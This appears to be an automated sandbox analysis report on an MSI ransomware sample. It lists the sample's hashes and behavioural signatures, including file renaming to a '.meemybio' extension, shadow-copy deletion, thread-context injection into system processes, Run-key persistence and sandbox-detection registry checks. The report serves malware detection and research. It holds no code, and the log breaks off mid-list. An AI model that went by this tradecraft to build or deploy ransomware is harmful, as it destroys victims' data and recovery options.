Analysis
-
max time kernel
1750s -
max time network
1800s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 06:50
Static task
static1
Behavioral task
behavioral1
Sample
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
Resource
win10v2004-20220414-en
General
-
Target
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi
-
Size
96KB
-
MD5
957d0c81c985609c580565a0323a14cd
-
SHA1
d8d46413409a14a1ae407107016e28074c6824d5
-
SHA256
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
-
SHA512
0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
Processes:
msedgerecovery.exeMicrosoftEdgeUpdateSetup.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateSetup_X86_1.3.161.35.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdge_X64_101.0.1210.53.exesetup.exeMicrosoftEdgeUpdate.exepid process 6032 msedgerecovery.exe 6004 MicrosoftEdgeUpdateSetup.exe 6000 MicrosoftEdgeUpdate.exe 6088 MicrosoftEdgeUpdate.exe 1372 MicrosoftEdgeUpdate.exe 3604 MicrosoftEdgeUpdateComRegisterShell64.exe 4960 MicrosoftEdgeUpdateComRegisterShell64.exe 2692 MicrosoftEdgeUpdateComRegisterShell64.exe 864 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 1852 MicrosoftEdgeUpdate.exe 2044 MicrosoftEdgeUpdate.exe 5080 MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe 4720 MicrosoftEdgeUpdate.exe 464 MicrosoftEdgeUpdate.exe 5064 MicrosoftEdgeUpdate.exe 1920 MicrosoftEdgeUpdate.exe 2616 MicrosoftEdgeUpdateComRegisterShell64.exe 2132 MicrosoftEdgeUpdateComRegisterShell64.exe 228 MicrosoftEdgeUpdateComRegisterShell64.exe 2908 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3172 MicrosoftEdgeUpdate.exe 5776 MicrosoftEdge_X64_101.0.1210.53.exe 5808 setup.exe 5960 MicrosoftEdgeUpdate.exe -
Modifies Installed Components in the registry 2 TTPs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
MsiExec.exedescription ioc process File renamed C:\Users\Admin\Pictures\DenyClear.crw => C:\Users\Admin\Pictures\DenyClear.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\GroupCopy.crw => C:\Users\Admin\Pictures\GroupCopy.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\UnprotectUnlock.crw => C:\Users\Admin\Pictures\UnprotectUnlock.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\MountInvoke.png => C:\Users\Admin\Pictures\MountInvoke.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\SearchRevoke.png => C:\Users\Admin\Pictures\SearchRevoke.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\ShowCopy.tif => C:\Users\Admin\Pictures\ShowCopy.tif.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\ConvertEnable.crw => C:\Users\Admin\Pictures\ConvertEnable.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\CopyClear.png => C:\Users\Admin\Pictures\CopyClear.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\InitializeCompress.png => C:\Users\Admin\Pictures\InitializeCompress.png.meemybio MsiExec.exe -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 32 IoCs
Processes:
MsiExec.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exepid process 2364 MsiExec.exe 6000 MicrosoftEdgeUpdate.exe 6088 MicrosoftEdgeUpdate.exe 1372 MicrosoftEdgeUpdate.exe 3604 MicrosoftEdgeUpdateComRegisterShell64.exe 1372 MicrosoftEdgeUpdate.exe 4960 MicrosoftEdgeUpdateComRegisterShell64.exe 1372 MicrosoftEdgeUpdate.exe 2692 MicrosoftEdgeUpdateComRegisterShell64.exe 1372 MicrosoftEdgeUpdate.exe 864 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 1852 MicrosoftEdgeUpdate.exe 1852 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 2044 MicrosoftEdgeUpdate.exe 4720 MicrosoftEdgeUpdate.exe 464 MicrosoftEdgeUpdate.exe 5064 MicrosoftEdgeUpdate.exe 1920 MicrosoftEdgeUpdate.exe 2616 MicrosoftEdgeUpdateComRegisterShell64.exe 1920 MicrosoftEdgeUpdate.exe 2132 MicrosoftEdgeUpdateComRegisterShell64.exe 1920 MicrosoftEdgeUpdate.exe 228 MicrosoftEdgeUpdateComRegisterShell64.exe 1920 MicrosoftEdgeUpdate.exe 2908 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3172 MicrosoftEdgeUpdate.exe 3172 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 5960 MicrosoftEdgeUpdate.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
msedge.exesetup.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 1 IoCs
Processes:
setup.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk setup.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid process target process PID 2364 set thread context of 2776 2364 MsiExec.exe sihost.exe PID 2364 set thread context of 2800 2364 MsiExec.exe svchost.exe PID 2364 set thread context of 2872 2364 MsiExec.exe taskhostw.exe -
Drops file in Program Files directory 64 IoCs
Processes:
MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exesetup.exeMicrosoftEdgeUpdateSetup.exeMicrosoftEdgeUpdate.exeMicrosoftEdge_X64_101.0.1210.53.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_kk.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\sr.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedge.exe.sig setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogo.png setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoCanary.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedge_proxy.exe setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_kn.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_da.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\VisualElements\LogoDev.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Social setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\vi.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\fa.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\hr.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\pwahelper.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\v8_context_snapshot.bin setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\km.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_fr.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_hi.dll MicrosoftEdgeUpdateSetup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\sv.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\nacl_irt_x86_64.nexe setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\lt.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoBeta.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\identity_proxy\resources.pri setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_te.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\ml.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\libGLESv2.dll setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_uk.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\psuser_arm64.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Fingerprinting setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\az.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\de.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\MicrosoftEdgeComRegisterShellARM64.exe MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Mu\Content setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\lt.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\notification_helper.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\vccorlib140.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\vcruntime140.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Trust Protection Lists\Sigma\Entities setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\MLModels\autofill_labeling_features.txt setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_id.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_ur.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\101.0.1210.53.manifest setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\bs.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\gd.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU85CB.tmp\msedgeupdateres_as.dll MicrosoftEdgeUpdateSetup_X86_1.3.161.35.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\de.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_lo.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\et.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\VisualElements\SmallLogoDev.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\kok.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\ug.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\edge_feedback\mf_trace.wprp setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_am.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_bn.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{613F5B52-8BA7-4DF8-913D-DB0653388D7D}\EDGEMITMP_4E0CA.tmp\SETUP.EX_ MicrosoftEdge_X64_101.0.1210.53.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\lo.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\Locales\zh-CN.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\psuser_64.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\msedgeupdateres_en.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\elevation_service.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\libsmartscreen.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\101.0.1210.53\msedgewebview2.exe.sig setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.53\Locales\ca.pak setup.exe -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA} msiexec.exe File created C:\Windows\Installer\e56c652.msi msiexec.exe File opened for modification C:\Windows\Installer\e56c652.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIC76B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICBF1.tmp msiexec.exe File created C:\Windows\Installer\e56c654.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000066bbc37791d732ea0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000066bbc3770000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff00000000070001000068090066bbc377000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000066bbc37700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000066bbc37700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened 